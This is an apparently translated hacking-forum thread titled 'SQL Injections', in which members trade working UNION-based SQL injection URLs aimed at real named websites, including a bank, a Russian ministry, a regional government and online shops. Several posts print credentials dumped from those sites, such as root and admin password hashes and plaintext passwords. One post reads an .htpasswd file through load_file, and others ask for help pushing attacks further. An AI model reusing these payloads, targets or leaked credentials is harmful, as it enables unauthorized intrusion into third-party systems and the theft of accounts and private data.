SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. XTErner

    geia.org.br/shop
    Code:
    http://geia.org.br/shop/detalhe.php?id=-197+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+INFORMATION_SCHEMA.TABLES+limit+35,1/*
     
  2. kair

    some bank
    http://www.tsb.kz/info.php?id=180%20union%20select%201,version(),database(),4,5,user(),7,8/*
     
  3. BlackCats

    http://www.urlopwpolsce.pl/kategoria.php?id=17+order+by+2/*
     
  4. Ksander

    www.Reflex.Se

    Code:
    http://www.reflex.se/news.php?ID=-1+union+select+1,concat(username,char(58),password),3,4,5,6,7+from+users/*
     
  5. XTErner

    Code:
    http://www.eletrofar.com.br/shop/compra.php?id=-40%20UNION%20SELECT%201,2,version(),4,5,6/*
     
  6. BlackCats

    http://www.norden.ee/indexee.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
     
  7. kair

    from \6/
    and where is the injection?
     
  8. BlackCats

    uh, it was right here :)
    http://www.norden.ee/indexee.php?ID=17,23+order+by+16
     
  9. XTErner

    Code:
    http://www.edu.upplands-bro.se/ubg/index.php?id=-214+union+select+1,user_name,user_password,4+from+admin/*
    name:Super Admin
    password:huggan
     
  10. *D1VER

    http://www.tvdata.ru/catalog.php?dir=-2+union+select+1,2,3,4,5,load_file('/home/www/htdocs/admin/.htpasswd'),7,8,9,10,11,12/*

    http://www.offroad.ru/gallery/gal_picshow.php?g_id=-1+union+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/*???
     
    #1310 *D1VER, 23 Mar 2007
    Last edited: 23 Mar 2007
  11. piton

    http://2pay.ru/geo/?id=0&st=0&a=2&town=1'
    help me do something further with this =)
     
  12. n1†R0x

    Code:
    http://christdot.org/modules.php?name=News&file=article&sid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
    too lazy to go further :D
    there is XSS in the search
     
  13. n1†R0x

    avo.ru
    Administration of Vladimir Oblast
    Code:
    http://www.avo.ru/content.php?menu=1603&page_id=147+and+147=-1+union+select+1,concat(user,0x3a,password)+from+mysql.user/*
    root:7bf340b309e53784

    ipm.cz
    Code:
    http://www.ipm.cz/group/index.php?group=-1+union+select+1,2,3,4,5,6,concat(user,0x3a,password),8,9+from+mysql.user+limit+1,1/*
    milada:5d6f92636d33cb3d

    passwords are in mysql4-hash


    ///sorry for 2 posts in a row, editing isn't working for some reason..
     
  14. InferNo23

    MP3Db.ru
    Code:
    http://mp3db.ru/index.php?cid=8&subcid=-1+union+select+1,login,passwd,4,5,6,7,8,9,10,11,12+from+users/*
    passwords are in md5
     
  15. kamaz

    http://gp.by/admin

    I really liked the error :)
    http://belarus21.by/admin

    Can anything be done with this one? Union doesn't work.
     
  16. zl0ba

    MINISTRY OF INFORMATION TECHNOLOGIES AND COMMUNICATIONS OF THE RUSSIAN FEDERATION

    Code:
    http://english.minsvyaz.ru/news.shtml?id=-1+UNION+SELECT+VERSION()/*&news_id=36
     
  17. Grey

    Code:
    http://valiza.com.ua/opinions.php?id=-1+union+select+1,2,concat(username,char(58),email,char(58),password),4,5,6,7+from+phorum_users/*
     
  18. Snap

    http://forum.filippoff.ru/theme.php?id=-58+union+select+1,2,concat(login,char(58)pass),4,5,6,7,8,910,11,12+from+users+limit+0,1/*

    Password in plaintext =)

    roman:331133

    http://filippoff.ru/page.php?id=-12+union+select+1,concat(login,char(58),pass),3+from+user/*


    http://www.montech.ru/index.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
    http://www.fischer-fix.ru/index.php?id=-127+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

    http://www.lightpro.ru/news/detail.php?id_news=-3
    http://www.chelkomp.ru/description.php?id=00000000046&grp=-1
     
    #1318 Snap, 23 Mar 2007
    Last edited: 23 Mar 2007
  19. Micr0b

    Code:
    http://www.jgts.net/post.php?id=-477+ORDER+BY+10/*
     
  20. kair

    http://www.barcode.shark.ru/page.php?id=180%20union%20select%201,2,password,4,5,6,7,8,9,10%20from%20mysql.user/*

    http://ventorg.ru/index.php?id=180%20union%20select%201/*

    http://tuz-by.com/viewperson.php?id=180%20union%20select%201,2,3,4,5,6,7,8,9,10/*
     